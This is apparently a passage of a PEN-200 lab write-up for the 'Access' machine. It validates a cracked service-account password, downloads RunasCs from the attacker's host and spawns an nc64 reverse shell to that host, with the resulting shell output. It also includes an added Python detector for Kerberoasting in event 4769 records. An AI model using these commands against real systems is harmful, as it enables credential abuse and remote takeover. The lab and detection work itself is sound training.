svc_mssql
Validating the cracked TGS-REP hash of the svc_mssql account.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ impacket-getTGT ACCESS.OFFSEC/svc_mssql@server.access.offsec -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: trustno1
[*] Saving ticket in svc_mssql@server.access.offsec.ccache
Validated: a TGT was generated for the svc_mssql account, confirming the cracked password.
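The hash validated above only exists because a service ticket for svc_mssql was requested and issued with a crackable (RC4) encryption type. As an added detection example, not part of the original writeup, the following scans Windows Security event 4769 records for that pattern; the records, the jdoe requester, the svc_apache service and the source IPs are constructed sample data.

```python
"""Flag Kerberoast-style TGS requests in Windows Security event 4769 records.

Added example (not from the original writeup). Cracking a TGS-REP hash, as done
above for svc_mssql, starts with a TGS request whose ticket was issued with
RC4 (etype 0x17), which domains using AES service tickets rarely emit.
Field names follow the 4769 event schema; the records are constructed.
"""

# Constructed sample 4769 records (field names as in the Windows 4769 event).
SAMPLE_EVENTS = [
    {"TargetUserName": "jdoe@ACCESS.OFFSEC", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.224.50", "Status": "0x0"},
    {"TargetUserName": "jdoe@ACCESS.OFFSEC", "ServiceName": "svc_apache",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.224.50", "Status": "0x0"},
    {"TargetUserName": "jdoe@ACCESS.OFFSEC", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.224.50", "Status": "0x0"},
    {"TargetUserName": "SERVER$@ACCESS.OFFSEC", "ServiceName": "cifs/server",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.224.187", "Status": "0x0"},
]

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP


def rc4_service_tickets(events):
    """Return successful TGS requests issued with an RC4 ticket, excluding the
    krbtgt service (a 4769 for krbtgt is a TGT renewal, not a roastable SPN)."""
    return [e for e in events
            if e["TicketEncryptionType"].lower() in RC4_ETYPES
            and e["Status"] == "0x0"
            and not e["ServiceName"].lower().startswith("krbtgt")]


def roast_suspects(events, threshold=2):
    """Requesters (user + source IP) that pulled RC4 tickets for at least
    `threshold` distinct services. One RC4 ticket can be legacy noise; a burst
    across several SPNs from one host is the Kerberoasting pattern."""
    per_requester = {}
    for e in rc4_service_tickets(events):
        key = (e["TargetUserName"], e["IpAddress"])
        per_requester.setdefault(key, set()).add(e["ServiceName"])
    return {k: sorted(v) for k, v in per_requester.items() if len(v) >= threshold}
```

Lowering the threshold to 1 turns it into an inventory of every service account still receiving RC4 tickets, which is the list to migrate to AES keys or gMSA-managed passwords.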
Shell
The built-in runas.exe cannot be used here because it prompts for the password interactively instead of accepting it on the command line, so RunasCs is used instead.
PS C:\tmp> iwr -Uri http://192.168.45.171/RunasCs.exe -OutFile .\RunasCs.exe
Delivering RunasCs
PS C:\tmp> .\RunasCs.exe "svc_mssql" trustno1 "cmd /c C:\\tmp\\nc64.exe 192.168.45.171 8888 -e powershell"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
Invoking a reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [192.168.45.171] from (UNKNOWN) [192.168.224.187] 50592
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
access\svc_mssql
PS C:\Windows\system32> hostname
hostname
SERVER
PS C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.224.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.224.254
Lateral movement made to the svc_mssql account.